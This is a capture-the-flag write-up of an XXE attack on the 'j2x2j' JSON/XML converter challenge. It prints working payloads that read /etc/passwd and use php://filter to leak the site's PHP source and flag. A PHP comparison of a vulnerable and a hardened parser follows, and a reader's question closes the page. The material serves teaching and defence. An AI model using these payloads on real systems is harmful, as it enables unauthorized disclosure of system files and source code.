Link: http://j2x2j.chal.ctf.westerns.tokyo/
At a glance, I saw the words "JSON <-> XML Converter" in the title. Obviously, I immediately thought of XXE.
Back on the site's interface, there are 2 boxes: a JSON format box and an XML format box. By using the following payload, we can determine whether it is really an XXE vulnerability or not.
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
Put this payload and boom!
Later, I found that the site was written in PHP, and in my poison repository there were weapons available to solve this problem :) I used a PHP wrapper inside the XXE payload:
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> <contacts> <contact> <name>lnlinh31 &xxe; </name> </contact> </contacts>
Looking at the first line of index.php, you know what to do?
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.php"> ]> <contacts> <contact> <name>lnlinh31 &xxe; </name> </contact> </contacts>
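As an added illustration (the challenge's own source is never shown in this writeup, so this is not it): an XML-to-JSON handler in PHP in the vulnerable shape that explains the behaviour above, beside a hardened version. The function names and the handler itself are assumptions; the input is the writeup's first probe payload.

```php
<?php
// Added example, not the j2x2j site's code: how an XML -> JSON converter
// becomes an XXE oracle, and what the fix looks like.

// Constructed input: the first probe payload from the writeup.
$xml = '<?xml version="1.0"?>'
     . '<!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]>'
     . '<root>&test;</root>';

// Vulnerable: LIBXML_NOENT asks libxml to substitute entities, so the
// external SYSTEM entity is resolved (file://, php://filter, ...) and its
// content is copied straight into the JSON the user gets back.
function xmlToJsonVulnerable(string $xml): string
{
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    return json_encode($doc);
}

// Hardened: refuse any DOCTYPE (a converter has no legitimate use for DTDs;
// the XML grammar requires the literal token "<!DOCTYPE", so a plain string
// check cannot be bypassed with whitespace or case tricks), never pass
// LIBXML_NOENT, forbid network fetches, and keep the external entity loader
// off. The explicit libxml_disable_entity_loader() call is only needed on
// PHP < 8.0; since 8.0 the loader is disabled by default and the call is
// deprecated, so it is gated on the version.
function xmlToJsonHardened(string $xml): ?string
{
    if (strpos($xml, '<!DOCTYPE') !== false) {
        return null; // reject instead of trying to sanitise the DTD
    }
    $prev = libxml_use_internal_errors(true);
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return $doc === false ? null : json_encode($doc);
}

var_dump(xmlToJsonVulnerable($xml)); // JSON containing the contents of /etc/passwd
var_dump(xmlToJsonHardened($xml));   // NULL: the DOCTYPE is rejected
```

The same rejection stops the php://filter/... variants, since they rely on the same external entity declaration; in a log, a DOCTYPE arriving at a JSON/XML converter endpoint is itself the detection signal.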
Flag: TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}
Hope this article makes you satisfied, thanks for watching :)
What leads you to use php://filter/... ? From where can I learn this? How is that called?